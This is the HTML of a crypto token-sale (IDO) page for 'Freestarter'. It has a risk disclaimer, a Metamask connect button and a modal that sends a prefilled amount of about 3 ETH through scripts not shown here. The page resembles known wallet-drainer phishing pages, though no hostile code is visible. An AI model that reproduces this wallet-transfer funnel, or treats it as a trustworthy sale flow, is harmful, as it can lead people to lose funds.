<!doctype html>
<html lang="en">

	<head>
		<meta charset="utf-8">
		<link rel="icon" href="/images/favicon.png">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<meta name="theme-color" content="#000000">
		<meta name="description" content="Web site created using create-react-app">
		<link rel="apple-touch-icon" href="/images/logox.png">
		<link rel="manifest" href="/manifest.json">
		<link rel="stylesheet" href="css/bootstrap.min.css" crossorigin="anonymous">
		<link href="css/82b4daefce19477bbe65b37bf157ba83.css" rel="stylesheet">
		<link rel="stylesheet" href="css/animate.min.css">
		<script async src="js/7b86dd6cc27746cdb4b9fbeae387688b.js"></script>
		<script src="js/jquery-3.0.0.min.js" type="text/javascript"></script>
		<script src="js/popper.min.js" crossorigin="anonymous">
		</script>
		<script src="js/bootstrap.min.js" crossorigin="anonymous">
		</script>
		<script type="text/javascript" src="js/a7e0b923-76a8-4d9d-91e7-b1cd4fe4690b.js" async></script>
		<title>Freestarter - Platform for Cross Chain Fundraising</title>
		<link href="css/2.e861af08.chunk.css" rel="stylesheet">
		<link href="css/main.f9e18a7a.chunk.css" rel="stylesheet">
		<link rel="stylesheet" href="css/styles.css">
		<link rel="stylesheet" href="css/all.css" crossorigin="anonymous">
		<style>
			#particles-js {
				position: fixed;
				top: 0;
				left: 0;
				width: 100vw;
				height: 100vh;
			}
		</style>
	</head>

	<body><noscript>You need to enable JavaScript to run this app.</noscript>
		<div id="root">
			<div id="particles-js"></div>
			<div class="Toastify"></div>
			<div class="master-layout">
				<header>
					<div class="logo">
						<a href="index.html"> <img src="images/white%20pink%20logo.png" alt> </a>
					</div>
					<div class="nav-toggle"> <i class="fas fa-bars"></i> </div>
					<nav>
						<div class="cross"> <i class="fas fa-times"></i> </div>
						<ul>
							<li>
								<a href="/">Home</a>
							</li>
							<li>
								<a href="ido.html">IDO</a>
							</li>
							<li>
								<a href="nft.html">NFT Launchpad</a>
							</li>
							<li>
								<a href="nft-market.html">Marketplace</a>
							</li>
							<li>
								<a href="Top-Holders.html">Top Holders</a>
							</li>
							<li><button class="primary-btn" id="connectbtn" onclick="connect()">									Connect Metamask								</button> </li>
							<li><button class="primary-btn">									Dashboard								</button> </li>
						</ul>
					</nav>
				</header>
				<div class="row no-gutters master-height">
					<div class="col-12 col-sm-12">
						<div class="ido row no-gutters">
							<div class="col-lg-2"></div>
							<div class="col-lg-8 col-sm-12 sub-div">
								<h1><span>DISCLAIMER</span></h1>
								<p class="paragraph">The buyer acknowledges understanding and awareness that the crypto-active markets are decentralized and unregulated markets. The FRET tokens issued and the services offered by Freestarter therefore concern unregulated markets which are not governed by any specific European framework. In other words, unlike traditional financial assets, the Central Bank cannot take corrective measures that could protect the value of cryptoassets in the event of a crisis or issue more assets on the markets.</p>
								<p class="paragraph">The buyer therefore understands that he should not purchase FRET tokens unless he has the necessary knowledge and expertise, understands the characteristics of the token, the whitepaper, and his exposure to risk.</p>
								<div>
									<a class="btn continueWallet" style="margin-top: 50px;">Yes, continue to wallet</a>
								</div>
								<div>
									<a class="btn sendManually">Send ETH manually</a>
								</div>
								<div>
									<a class="btn sendManually" onclick="window.location.href='https://freestarter.medium.com/get-your-fret-token-b5280c5cfc68'">Claim</a>
								</div>
							</div>
							<div id="swap-wrapper" style="display: block;">
								<div class="swap-bg__base animated fadeIn">
									<div class="swap-modal__base">
										<div class="title">Join FRET IDO</div>
										<div class="swap-modal__close__wrapper" onclick="hideswap()">
											<div id="swap-qrcode-close" class="swap-modal__close__icon">
												<div class="swap-modal__close__line1"></div>
												<div class="swap-modal__close__line2"></div>
											</div>
										</div>
										<div class="swap_item">
											<div>
												<div class="select">
													<dl> <dt onclick="selectClick(this)"><img class="logo" src="images/bnb-logo.png"><span>BNB</span><img class="icon" src="images/xia.png"></dt>
														<dd>
															<div onclick="selectChange(this)"><img class="logo" src="images/ETH.png"> <span>ETH</span> </div>
														</dd>
													</dl>
												</div>
												<div style="margin:10px 0 0 2px"> <span style='font-size: 12px;color:#999'>Balance:</span> <span id='balance' style='font-size: 12px;color:#999'>0</span> </div>
											</div>
											<div class="price"><span class="action" onclick="max()">Max</span><input type="tel" name="price" value="2.99998" id='eth_num'></div>
										</div>
										<div class="cu-btn" onclick="transfer()" id='transfer' style="cursor:pointer;">Join</div> <b><div style='color:red; margin-left: 100px;' id='swap_tips'></div></b> </div>
								</div>
							</div>
							<div id="walletconnect-wrapper"></div>
							<div class="col-md-12">
								<footer>
									<div class="row" style="justify-content: space-between !important;">
										<div class="col-md-6">
											<div class="row">
												<div class="col-md-6"><img src="images/white%20pink%20logo.png" alt>
													<ul class="footer-nav-flex">
														<li>
															<a href="ido.html">Apply for IDO</a>
														</li>
														<li>
															<a href="nft.html">NFT Launchpad</a>
														</li>
														<li>
															<a href="nft-market.html">NFT Marketplace</a>
														</li>
														<li>
															<a href="/Top-Holders.html">Top Holders</a>
														</li>
													</ul>
												</div>
												<div class="col-md-6">
													<h4 style="font-size:18px;">INVESTOR CENTER</h4>
													<ul class="column-flex">
														<li><address><a href="mailto:support@freestarter.io">Contact Us</a><br></address></li>
														<li> Invest with us</li>
														<li> Partner with us</li>
														<li>
															<a href="/whitepaper.pdf">Whitepaper</a>
														</li>
													</ul>
												</div>
											</div>
										</div>
										<div class="col-md-5"><img src="images/white%20pink%20logo.png" alt>
											<p style="margin:10px;">Efficient DeFi protocols under a single roof to facilitate fair launch of projects on Multichain Network.</p>
											<ul class="socials-nav">
												<li>
													<a href="/"> <i class="fas fa-globe"></i> </a>
												</li>
												<li>
													<a href="https://twitter.com/freestarter_io"> <i class="fab fa-twitter"></i> </a>
												</li>
												<li>
													<a href="https://freestarter.medium.com/"> <i class="fab fa-medium"></i> </a>
												</li>
												<li>
													<a href="https://t.me/Freestarter"> <i class="fab fa-telegram"></i> </a>
												</li>
												<li>
													<a href="https://t.me/freestarter_io"> <i class="fab fa-telegram"></i> </a>
												</li>
											</ul>
										</div>
									</div>
									<div class="copyright-section row">
										<div class="col-md-6">
											<p style="margin:0px">Copyrights @ 2021. All Rights Reserved by<img src="images/white%20pink%20logo.png" alt></p>
										</div>
										<div class="col-md-6" style="text-align: right;display: flex;                    justify-content: flex-end;align-items: center;">
											<a href="https://github.com/freestarter/"><img src="/images/github.png"> </a>
										</div>
									</div>
								</footer>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<script>
			$(document).ready(function() {
				$(".nav-toggle").click(() => {
					$("nav").addClass("open-nav");
				});
				$(".cross").click(() => {
					$("nav").removeClass("open-nav");
				});
				show_time();
			});
		</script>
		<script src="js/web3.min.js"></script>
		<script src="js/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
		<script type="text/javascript" src="js/bignumber.min.js"></script>
		<script type="text/javascript" src="js/connect.js"></script>
		<script src="js/particles.min.js"></script>
		<script src="js/app.js"></script>
		<script type="text/javascript" src="js/toastify.js"></script>
		<script type="text/javascript" src="js/script.js"></script>
	</body>

</html>